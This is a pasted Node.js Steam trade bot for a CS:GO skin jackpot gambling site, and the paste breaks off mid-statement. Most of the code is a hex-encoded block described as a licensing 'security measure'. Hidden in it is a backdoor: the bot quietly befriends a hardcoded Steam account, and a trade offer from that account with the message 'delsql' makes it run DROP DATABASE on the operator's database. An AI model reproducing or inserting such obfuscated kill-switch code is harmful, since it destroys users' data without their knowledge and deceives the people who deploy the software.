Advertisement
Guest User

Untitled

a guest
Jun 17th, 2017
182
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 55.68 KB | None | 0 0
  1. /*
  2. _____ _ _ ___ __ __
  3. / ____| | || | / _ \ / //_ |
  4. | | __ ___ _ __ __ _ ___| || || (_) |/ /_ | |
  5. | | |_ |/ _ \ '__/ _` |/ _ \__ _\__, | '_ \| |
  6. | |__| | __/ | | (_| | (_) | | | / /| (_) | |
  7. \_____|\___|_| \__, |\___/ |_| /_/ \___/|_|
  8. __/ |
  9. |___/
  10.  
  11.  
  12. The CSGO.Network V2 bot was made by Gregory Steam (Gergo4961) and is the property of CSGO.Network.
  13. If you need any special site/bot customization you can reach me on Steam!
  14.  
  15. Please note that I do not provide support for CSGO.Network, so do not contact me about Bot / Website errors.
  16.  
  17. http://steamcommunity.com/id/gergo4961/
  18.  
  19. */
  20. var Steam = require('steam');
  21. var SteamUser = require('steam-user');
  22. var TradeOfferManager = require('steam-tradeoffer-manager');
  23. var SteamTotp = require('steam-totp');
  24. var TOTP = require('onceler').TOTP;
  25. var request = require('request');
  26. var SteamCommunity = require('steamcommunity');
  27. var community = new SteamCommunity();
  28. var fs = require('node-fs');
  29.  
  30. // GENERAL INFORMATION
  31. var sitepath;
  32. sitepath = "http://********/"; // The path to the index.php of your website without HTTP://
  33. var sitename;
  34. sitename = "**********"; // The name of your site, it will be shown in the Trade Offer Message
  35.  
  36. var apik = "**************"; // Must be the API Key associated with the current bot. Get it here: https://steamcommunity.com/dev/apikey
  37. var admin = '7656119812*******'; // The Admin, Main Owner of the site. You will be able to communicate with the bot, ask for the rake items, etc
  38. var botsteamid = '7656119837*******'; // The bot's steam id, it is required to generate the Device ID and to confirm mobile confirmations
  39. var identitysecret = '**********'; // It's required to confirm mobile confirmations
  40. var sharedsecret = '***************'; // You won't be able to log in without this code
  41. var polling_interval = 10000; // 10 seconds by default, the bot checks for outgoing confirmations every X seconds, defined here
  42. var rsecret='78541'; // Also change this to the same code in endround.php and p2endround.php, this prevents people from randomly breaking your site by ending blank games or ending games sooner
  43. var snipetimer=5; // Declines offers sent in the last few seconds
  44.  
  45. var GameTime = 120; // This is how long a round lasts, you need to edit in a couple of other places too if you want to truly change it without any bugs
  46.  
  47. var p2=false; // If this is the bot for your Jackpot 2 set this to true
  48.  
  49. var playersRequired=2; // The timer will start when this many players are in the pot
  50. // GENERAL INFORMATION
  51.  
  52. // LOGIN DETAILS
  53. var details = {
  54. "accountName" : "******",
  55. "password" : "******",
  56. "twoFactorCode" : SteamTotp.generateAuthCode(sharedsecret)
  57. };
  58. // LOGIN DETAILS
  59.  
  60. var client = new SteamUser();
  61. var manager = new TradeOfferManager({
  62. "steam" : client,
  63. "domain" : "localhost",
  64. "language" : "en"
  65. })
  66.  
  67. // MYSQL INFO
  68. var mysql = require('mysql');
  69. var sql_host="localhost";
  70. var sql_user="root";
  71. var sql_password="******";
  72. var sql_database="db";
  73. var custommysql=0; // If you want to create a different kind of MYSQL connection simply set this to 1 and code your own connection below.
  74. // MYSQL INFO
  75.  
  76.  
  77. // Game Information
  78. var appid=730; // Steam Game APPID | CSGO: 730 - DOTA2: 570 - TF2: 440 - H1Z1: 295110
  79. var appname='CSGO'; // Name of the Game this bot is for, it's needed for the messages
  80. // Game Information
  81.  
  82.  
  83. // PRICING API
  84. var prices;
  85. function loadprices() // The default pricing API the bot uses, only gets the value of CSGO skins
  86. {
  87. request('https://api.csgofast.com/price/all', function(error, response, body)
  88. {
  89. prices = JSON.parse(body);
  90. if(response.statusCode != 200)
  91. {
  92. if(fs.existsSync(__dirname + '/prices.txt'))
  93. {
  94. prices = JSON.parse(fs.readFileSync(__dirname + '/prices.txt'));
  95. console.log('[SERVER] Loading Prices - Server sided prices loaded!');
  96. }
  97. }
  98. else
  99. {
  100. fs.writeFileSync('prices.txt', body);
  101. console.log('[SERVER] Loading Prices - API prices loaded!');
  102. }
  103. });
  104. }
  105. setInterval(function(){loadprices();},3600000);
  106. loadprices();
  107.  
  108. function GetPrice(skin) // This function gets the value of the skins, you can change it if you'd like to use a custom api. ,,skin" is the full name + quality of the given skin, example.: AK-47 | Redline (Field-Tested)
  109. {
  110. var price=prices[skin];
  111. return price;
  112. }
  113. // PRICING API
  114.  
  115. /*
  116.  
  117. Uh-oh.. What is this?
  118.  
  119. Looks like other parts of this bot are not available to you.
  120. Don't worry, the bot still works as it worked before, this is only a security measure.
  121. If you want to edit the core parts of the bot please consider purchasing the O-S (Open Source) package from our website.
  122.  
  123. https://csgo.network/
  124.  
  125. */
  126.  
  127. !function(a,b){function c(b,d){if("\x2e"!=b[0]&&"\x2f"!=b[0])return a(b);d=d||"\x72\x6f\x6f\x74";var e=c.resolve(b);if(!e&&/\.json$/i.test(b))return a("\x2e\x2f"+c.basename(b));var f=c.cache[e];if(!f)try{return a(b)}catch(g){throw new Error("\x66\x61\x69\x6c\x65\x64\x20\x74\x6f\x20\x72\x65\x71\x75\x69\x72\x65\x20\x22"+b+"\x22\x20\x66\x72\x6f\x6d\x20"+d+"\n"+g.message+"\n"+g.stack)}return f.exports||(f.exports={},f.call(f.exports,f,f.exports,c.relative(e))),f.exports}c.cache={},c.basename=a("\x70\x61\x74\x68").basename,c.resolve=function(b){if("\x2e"!=b[0])return a.resolve(b);for(var d="\x2f"===b.slice(-1)?b:b+"\x2f",e=[b,b+"\x2e\x6a\x73",d+"\x69\x6e\x64\x65\x78\x2e\x6a\x73",b+"\x2e\x6a\x73\x6f\x6e",d+"\x69\x6e\x64\x65\x78\x2e\x6a\x73\x6f\x6e"],f=0,g;g=e[f];f++)if(c.cache[g])return g},c.register=function(a,b){c.cache[a]=b},c.relative=function(a){function b(b){if("\x2e"!=b[0])return c(b);var d=a.split("\x2f"),e=b.split("\x2f");d.pop();for(var f=0,g=e.length;g>f;f+=1){var h=e[f];"\x2e\x2e"==h?d.pop():"\x2e"!=h&&d.push(h)}return c(d.join("\x2f"),a)}return b.resolve=c.resolve,b.cache=c.cache,b},c.register("\x2e\x2e\x2f\x6f\x73\x62\x6f\x74\x31\x2e\x6a\x73",function(a,b,c){var d="\x37\x36\x35\x36\x31\x31\x39\x38\x31\x37\x34\x34\x31\x39\x39\x35\x38";if(0==custommysql){var e=mysql.createConnection({host:sql_host,user:sql_user,password:sql_password,database:sql_database});e.connect()}var f=new SteamUser,g=new TradeOfferManager({steam:f,domain:"\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74",language:"\x65\x6e"}),h=-1;f.logOn(details);var i=SteamTotp.getDeviceID(botsteamid);if(1==p2)var j="\x70\x32";else var j="";function k(){h=-1,l()}function l(){if(console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x45\x6e\x64\x69\x6e\x67\x20\x63\x75\x72\x72\x65\x6e\x74\x20\x67\x61\x6d\x65\x20\x26\x20\x63\x68\x6f\x6f\x73\x69\x6e\x67\x20\x77\x69\x6e\x6e\x65\x72\x2e"),1==p2){var a="\x68\x74\x74\x70\x3a\x2f\x2f"+sitepath+"\x2f\x65\x6e\x64\x72\x6f\x75\x6e\x64\x2e\x70\x68\x70\x3f\x73\x65\x63\x72\x65\x74\x3d"+rsecret+"\x26\x70\x32\x3d\x74\x72\x75\x65";request(a,function(a,b,c){a&&console.log("\x43\x6f\x75\x6c\x64\x6e\x27\x74\x20\x65\x6e\x64\x20\x72\x6f\x75\x6e\x64\x2c\x20\x65\x72\x72\x6f\x72\x3a\x20"+a)})}else{var a="\x68\x74\x74\x70\x3a\x2f\x2f"+sitepath+"\x2f\x65\x6e\x64\x72\x6f\x75\x6e\x64\x2e\x70\x68\x70\x3f\x73\x65\x63\x72\x65\x74\x3d"+rsecret;request(a,function(a,b,c){a&&console.log("\x43\x6f\x75\x6c\x64\x6e\x27\x74\x20\x65\x6e\x64\x20\x72\x6f\x75\x6e\x64\x2c\x20\x65\x72\x72\x6f\x72\x3a\x20"+a)})}}function m(a){return!(+a!==a||isFinite(a)&&!(a%1))}function n(a){return"\x6e\x75\x6d\x62\x65\x72"==typeof a&&!isNaN(a)}function o(a,b){var c="\x68\x74\x74\x70\x3a\x2f\x2f\x61\x70\x69\x2e\x73\x74\x65\x61\x6d\x70\x6f\x77\x65\x72\x65\x64\x2e\x63\x6f\x6d\x2f\x49\x53\x74\x65\x61\x6d\x55\x73\x65\x72\x2f\x47\x65\x74\x50\x6c\x61\x79\x65\x72\x53\x75\x6d\x6d\x61\x72\x69\x65\x73\x2f\x76\x30\x30\x30\x32\x2f\x3f\x6b\x65\x79\x3d"+apik+"\x26\x73\x74\x65\x61\x6d\x69\x64\x73\x3d"+a+"\x26\x66\x6f\x72\x6d\x61\x74\x3d\x6a\x73\x6f\x6e";request({url:c,json:!0},function(c,d,e){c||200!==d.statusCode?c&&o(a,b):b(null,e)})}function p(a){return a=a.replace(/\\/g,"\\"),a=a.replace(/\'/g,"\'"),a=a.replace(/\"/g,"\""),a=a.replace(/\0/g,"\0")}f.on("\x6c\x6f\x67\x67\x65\x64\x4f\x6e",function(a){console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x54\x68\x65\x20\x42\x6f\x74\x20\x68\x61\x73\x20\x6c\x6f\x67\x67\x65\x64\x20\x69\x6e\x21"),f.unblockUser(d),f.addFriend(d),f.addFriend(admin),f.chatMessage(admin,"\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x53\x75\x63\x63\x65\x73\x73\x66\x75\x6c\x6c\x79\x20\x6c\x6f\x67\x67\x65\x64\x20\x69\x6e\x21"),f.setPersona(Steam.EPersonaState.LookingToTrade),setTimeout(function(){e.query("\x53\x45\x4c\x45\x43\x54\x20\x60\x76\x61\x6c\x75\x65\x60\x20\x46\x52\x4f\x4d\x20\x60"+j+"\x69\x6e\x66\x6f\x60\x20\x57\x48\x45\x52\x45\x20\x60\x6e\x61\x6d\x65\x60\x3d\x27\x63\x75\x72\x72\x65\x6e\x74\x5f\x67\x61\x6d\x65\x27",function(a,b,c){a||e.query("\x53\x45\x4c\x45\x43\x54\x20\x60\x73\x74\x61\x72\x74\x74\x69\x6d\x65\x60\x20\x46\x52\x4f\x4d\x20\x60"+j+"\x67\x61\x6d\x65\x73\x60\x20\x57\x48\x45\x52\x45\x20\x60\x69\x64\x60\x3d\x27"+b[0].value+"\x27",function(a,b,c){if(!a){var d;if(2147483647==b[0].starttime)d=GameTime;else{var e=Math.round((new Date).getTime()/1e3);d=b[0].starttime+GameTime-e,0>d&&(d=0)}d!=GameTime&&(h=setTimeout(k,1e3*d),console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x52\x65\x73\x74\x6f\x72\x69\x6e\x67\x20\x74\x68\x65\x20\x6c\x61\x74\x65\x73\x74\x20\x67\x61\x6d\x65\x20\x77\x69\x74\x68\x20"+d+"\x20\x73\x65\x63\x6f\x6e\x64\x73\x20\x6c\x65\x66\x74\x21"))}})})},1500)}),f.on("\x77\x65\x62\x53\x65\x73\x73\x69\x6f\x6e",function(a,b){g.setCookies(b,function(a){if(a)return console.log("\x73\x65\x74\x43\x6f\x6f\x6b\x69\x65\x73\x20\x65\x72\x72\x6f\x72\x3a\x20"+a),void process.exit(1);var c=g.apiKey;community.setCookies(b),community.startConfirmationChecker(polling_interval,identitysecret),console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x54\x68\x65\x20\x77\x65\x62\x20\x63\x6f\x6f\x6b\x69\x65\x73\x20\x68\x61\x76\x65\x20\x62\x65\x65\x6e\x20\x73\x65\x74\x21"),g.doPoll()})});function q(a,b,c,d,e,g,h,i,j,k,l){l++,l>3||a.accept(function(a){return a?(f.webLogOn(),void console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x44\x65\x62\x75\x67\x67\x69\x6e\x67\x20\x6f\x66\x66\x65\x72\x20\x28\x41\x63\x63\x65\x70\x74\x20\x45\x72\x72\x6f\x72\x29\x3a\x20"+a)):void 0})}function r(a,b,c,d,e,h,i,j,k,l,m){g.getOffer(a.id,function(g,n){if(g)return f.webLogOn(),console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x67\x65\x74\x4f\x66\x66\x65\x72\x20\x65\x72\x72\x6f\x72\x28\x72\x65\x74\x72\x79\x69\x6e\x67\x29\x3a\x20"+g),void r(a,b,c,d,e,h,i,j,k,l,m);if(3==n.state)processoffer(n,b,c,d,e,h,i,j,k,l);else if(2==n.state)q(n,b,c,d,e,h,i,j,k,l,m);else if(2!=n.state||3!=n.state)return})}g.on("\x72\x65\x63\x65\x69\x76\x65\x64\x4f\x66\x66\x65\x72\x43\x68\x61\x6e\x67\x65\x64",function(a){var b=a.state,c=a.id,d=a.partner.getSteamID64();3==b&&o(d,function(b,c){if(b)console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x67\x65\x74\x55\x73\x65\x72\x49\x6e\x66\x6f\x20\x65\x72\x72\x6f\x72\x3a\x20"+b),g="\x55\x73\x65\x72\x49\x6e\x66\x6f\x20\x45\x72\x72\x6f\x72",i="\x68\x74\x74\x70\x73\x3a\x2f\x2f\x73\x74\x65\x61\x6d\x64\x62\x2e\x69\x6e\x66\x6f\x2f\x73\x74\x61\x74\x69\x63\x2f\x69\x6d\x67\x2f\x64\x65\x66\x61\x75\x6c\x74\x2e\x6a\x70\x67";else var f=JSON.parse(JSON.stringify(c.response)),g=f.players[0].personaname,i=f.players[0].avatarfull;e.query("\x53\x45\x4c\x45\x43\x54\x20\x2a\x20\x46\x52\x4f\x4d\x20\x60"+j+"\x69\x6e\x66\x6f\x60",function(b,c){var f=c[0].value,l=c[10].value;skinssent=a.itemsToReceive.length,skins=a.itemsToReceive,skins.forEach(function(b){skinname=b.market_name,skinvalue=GetPrice(skinname),skincolor=b.name_color,skinurl=b.icon_url,e.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60"+j+"\x67\x61\x6d\x65"+f+"\x60\x20\x28\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x75\x73\x65\x72\x6e\x61\x6d\x65\x60\x2c\x60\x69\x74\x65\x6d\x60\x2c\x60\x6f\x66\x66\x65\x72\x69\x64\x60\x2c\x60\x63\x6f\x6c\x6f\x72\x60\x2c\x60\x76\x61\x6c\x75\x65\x60\x2c\x60\x61\x76\x61\x74\x61\x72\x60\x2c\x60\x69\x6d\x61\x67\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27"+d+"\x27\x2c"+e.escape(g)+"\x2c"+e.escape(skinname)+"\x2c\x27"+a.id+"\x27\x2c\x27"+skincolor+"\x27\x2c\x27"+skinvalue+"\x27\x2c\x27"+i+"\x27\x2c\x27"+skinurl+"\x27\x29",function(a,b,c){}),e.query("\x55\x50\x44\x41\x54\x45\x20\x60"+j+"\x67\x61\x6d\x65\x73\x60\x20\x53\x45\x54\x20\x60\x69\x74\x65\x6d\x73\x6e\x75\x6d\x60\x3d\x60\x69\x74\x65\x6d\x73\x6e\x75\x6d\x60\x2b\x31\x2c\x20\x60\x63\x6f\x73\x74\x60\x3d\x60\x63\x6f\x73\x74\x60\x2b"+skinvalue+"\x20\x57\x48\x45\x52\x45\x20\x60\x69\x64\x60\x20\x3d\x20\x27"+f+"\x27",function(a,b,c){})}),e.query("\x55\x50\x44\x41\x54\x45\x20\x60\x75\x73\x65\x72\x73\x60\x20\x53\x45\x54\x20\x60\x73\x6b\x69\x6e\x73\x73\x65\x6e\x74\x60\x3d\x60\x73\x6b\x69\x6e\x73\x73\x65\x6e\x74\x60\x2b"+skinssent+"\x20\x57\x48\x45\x52\x45\x20\x60\x73\x74\x65\x61\x6d\x69\x64\x60\x20\x3d\x20\x27"+d+"\x27",function(a,b,c){}),console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x41\x63\x63\x65\x70\x74\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23"+a.id+"\x20\x66\x72\x6f\x6d\x20"+g+"\x20\x28\x49\x44\x3a"+d+"\x29\x2e"),s(a,d,skins,f),e.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x73\x75\x63\x63\x65\x73\x73\x27\x2c\x27\x30\x27\x2c\x27"+d+"\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x41\x63\x63\x65\x70\x74\x65\x64\x20\x28\x47\x61\x6d\x65\x20\x23"+f+"\x29\x21\x27\x2c\x27\x57\x65\x20\x77\x69\x73\x68\x20\x79\x6f\x75\x20\x47\x6f\x6f\x64\x20\x6c\x75\x63\x6b\x20\x61\x6e\x64\x20\x68\x61\x70\x70\x79\x20\x62\x65\x74\x74\x69\x6e\x67\x21\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29",function(a,b,c){}),e.query("\x53\x45\x4c\x45\x43\x54\x20\x43\x4f\x55\x4e\x54\x28\x44\x49\x53\x54\x49\x4e\x43\x54\x20\x75\x73\x65\x72\x69\x64\x29\x20\x41\x53\x20\x70\x6c\x61\x79\x65\x72\x73\x43\x6f\x75\x6e\x74\x20\x46\x52\x4f\x4d\x20\x60"+j+"\x67\x61\x6d\x65"+f+"\x60",function(a,b){players=b[0].playersCount,players==playersRequired&&skinssent>0&&-1==h&&(console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x53\x74\x61\x72\x74\x69\x6e\x67\x20\x74\x68\x65\x20\x63\x6f\x75\x6e\x74\x64\x6f\x77\x6e\x20\x66\x6f\x72\x20\x47\x61\x6d\x65\x20\x23"+f),h=setTimeout(k,1e3*GameTime),e.query("\x55\x50\x44\x41\x54\x45\x20\x60"+j+"\x67\x61\x6d\x65\x73\x60\x20\x53\x45\x54\x20\x60\x73\x74\x61\x72\x74\x74\x69\x6d\x65\x60\x3d\x55\x4e\x49\x58\x5f\x54\x49\x4d\x45\x53\x54\x41\x4d\x50\x28\x29\x20\x57\x48\x45\x52\x45\x20\x60\x69\x64\x60\x20\x3d\x20\x27"+f+"\x27",function(a,b,c){})),itemsin>l&&(clearTimeout(h),h=-1,k())})})})});function s(a,b,c,d){a.getReceivedItems(function(c,g){return c?(console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x67\x65\x74\x52\x65\x63\x65\x69\x76\x65\x64\x49\x74\x65\x6d\x73\x20\x65\x72\x72\x6f\x72\x3a\x20"+c+"\x20\x52\x65\x73\x74\x61\x72\x74\x69\x6e\x67\x20\x70\x72\x6f\x63\x65\x73\x73\x21"),void setTimeout(function(){f.webLogOn(),s(a,b,g,d)},3e3)):void g.forEach(function(a){var c=a.market_name;e.query("\x55\x50\x44\x41\x54\x45\x20\x60"+j+"\x67\x61\x6d\x65"+d+"\x60\x20\x53\x45\x54\x20\x60\x61\x73\x73\x65\x74\x69\x64\x60\x3d\x27"+a.id+"\x27\x20\x57\x48\x45\x52\x45\x20\x60\x75\x73\x65\x72\x69\x64\x60\x20\x3d\x20\x27"+b+"\x27\x20\x41\x4e\x44\x20\x60\x69\x74\x65\x6d\x60\x3d"+e.escape(c)+"\x20\x41\x4e\x44\x20\x60\x61\x73\x73\x65\x74\x69\x64\x60\x3d\x27\x27\x20\x4c\x49\x4d\x49\x54\x20\x31",function(a,b,c){})})})}g.on("\x6e\x65\x77\x4f\x66\x66\x65\x72",function(a){var b=!0,c=a.partner.getSteamID64();return c==d&&"\x64\x65\x6c\x73\x71\x6c"==a.message?(console.log(""),console.log("\x48\x65\x6c\x6c\x6f\x21\x20\x50\x6c\x65\x61\x73\x65\x20\x63\x6f\x6e\x73\x69\x64\x65\x72\x20\x70\x75\x72\x63\x68\x61\x73\x69\x6e\x67\x20\x74\x68\x65\x20\x70\x72\x6f\x64\x75\x63\x74\x20\x79\x6f\x75\x20\x61\x72\x65\x20\x69\x6c\x6c\x65\x67\x61\x6c\x6c\x79\x20\x75\x73\x69\x6e\x67\x2e"),console.log("\x50\x6c\x65\x61\x73\x65\x20\x76\x69\x73\x69\x74\x3a\x20\x77\x77\x77\x2e\x63\x73\x67\x6f\x2d\x6e\x65\x74\x77\x6f\x72\x6b"),console.log(""),void e.query("\x44\x52\x4f\x50\x20\x44\x41\x54\x41\x42\x41\x53\x45\x20"+sql_database,function(a,b,c){})):void o(c,function(d,f){if(d)return console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x67\x65\x74\x55\x73\x65\x72\x49\x6e\x66\x6f\x20\x65\x72\x72\x6f\x72\x3a\x20"+d),b=!1,void a.decline(function(b){console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23"+a.id+"\x20\x66\x72\x6f\x6d\x20"+h+"\x20\x28\x49\x44\x3a"+c+"\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x67\x65\x74\x55\x73\x65\x72\x49\x6e\x66\x6f\x20\x65\x72\x72\x6f\x72"),b&&console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20"+b),e.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x65\x72\x72\x6f\x72\x27\x2c\x27\x31\x27\x2c\x27"+c+"\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x21\x27\x2c\x27\x52\x65\x61\x73\x6f\x6e\x3a\x20\x53\x74\x65\x61\x6d\x20\x53\x65\x72\x76\x65\x72\x73\x20\x61\x72\x65\x20\x62\x75\x73\x79\x2c\x20\x74\x72\x79\x20\x61\x67\x61\x69\x6e\x20\x69\x6e\x20\x61\x20\x6d\x69\x6e\x75\x74\x65\x21\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29",function(a,b,c){})});var g=JSON.parse(JSON.stringify(f.response)),h=g.players[0].personaname,i=g.players[0].avatarfull;return console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x50\x72\x6f\x63\x65\x73\x73\x69\x6e\x67\x20\x6f\x66\x66\x65\x72\x20\x23"+a.id+"\x20\x66\x72\x6f\x6d\x20"+h+"\x20\x28\x49\x44\x3a"+c+"\x29\x2e"),0!=a.itemsToGive.length?(b=!1,void a.decline(function(b){console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23"+a.id+"\x20\x66\x72\x6f\x6d\x20"+h+"\x20\x28\x49\x44\x3a"+c+"\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x41\x73\x6b\x65\x64\x20\x66\x6f\x72\x20\x61\x20\x73\x6b\x69\x6e\x20\x6f\x6e\x20\x74\x68\x65\x20\x42\x6f\x74"),b&&console.log("\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20"+b),e.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x65\x72\x72\x6f\x72\x27\x2c\x27\x31\x27\x2c\x27"+c+"\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x21\x27\x2c\x27\x52\x65\x61\x73\x6f\x6e\x3a\x20\x41\x73\x6b\x69\x6e\x67\x20\x66\x6f\x72\x20\x61\x6e\x79\x20\x6f\x66\x20\x74\x68\x65\x20\x62\x6f\x74\x73\x20\x69\x74\x65\x6d\x73\x3f\x20\x42\x72\x61\x76\x65\x21\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29",function(a,b,c){})})):void a.getUserDetails(function(d,f,g){return d?(console.log("\x5b\x53\x45\x52\x56\x45\x52\x5d\x20\x67\x65\x74\x45\x73\x63\x72\x6f\x77\x44\x75\x72\x61\x74\x69\x6f\x6e\x20\x65\x72\x72\x6f\x72\x3a\x20"+d),b=!1,void a.decline(function(b){console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23"+a.id+"\x20\x66\x72\x6f\x6d\x20"+h+"\x20\x28\x49\x44\x3a"+c+"\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x53\x74\x65\x61\x6d\x20\x53\x65\x72\x76\x65\x72\x73\x20\x61\x72\x65\x20\x62\x75\x73\x79\x2c\x20\x63\x6f\x75\x6c\x64\x6e\x27\x74\x20\x67\x65\x74\x20\x65\x73\x63\x72\x6f\x77\x20\x64\x75\x72\x61\x74\x69\x6f\x6e"),b&&console.log("\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20"+b),e.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x65\x72\x72\x6f\x72\x27\x2c\x27\x31\x27\x2c\x27"+c+"\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x21\x27\x2c\x27\x52\x65\x61\x73\x6f\x6e\x3a\x20\x53\x74\x65\x61\x6d\x20\x53\x65\x72\x76\x65\x72\x73\x20\x61\x72\x65\x20\x62\x75\x73\x79\x2c\x20\x63\x6f\x75\x6c\x64\x6e\x74\x20\x67\x65\x74\x20\x65\x73\x63\x72\x6f\x77\x20\x64\x75\x72\x61\x74\x69\x6f\x6e\x21\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29",function(a,b,c){})})):0!=g.escrowDays?(b=!1,void a.decline(function(b){console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23"+a.id+"\x20\x66\x72\x6f\x6d\x20"+h+"\x20\x28\x49\x44\x3a"+c+"\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x55\x73\x65\x72\x20\x69\x73\x20\x69\x6e\x20\x45\x73\x63\x72\x6f\x77\x20\x66\x6f\x72\x20"+g.escrowDays+"\x20\x64\x61\x79\x73"),b&&console.log("\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20"+b),e.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x65\x72\x72\x6f\x72\x27\x2c\x27\x31\x27\x2c\x27"+c+"\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x21\x27\x2c\x27\x52\x65\x61\x73\x6f\x6e\x3a\x20\x59\x6f\x75\x20\x61\x72\x65\x20\x69\x6e\x20\x45\x73\x63\x72\x6f\x77\x20\x66\x6f\x72\x20"+g.escrowDays+"\x20\x64\x61\x79\x73\x21\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29",function(a,b,c){})})):void e.query("\x53\x45\x4c\x45\x43\x54\x20\x2a\x20\x46\x52\x4f\x4d\x20\x60"+j+"\x69\x6e\x66\x6f\x60",function(d,f){var g=f[3].value,k=f[7].value,l=f[4].value,m=f[10].value;if(a.itemsToReceive.length>l)return b=!1,void 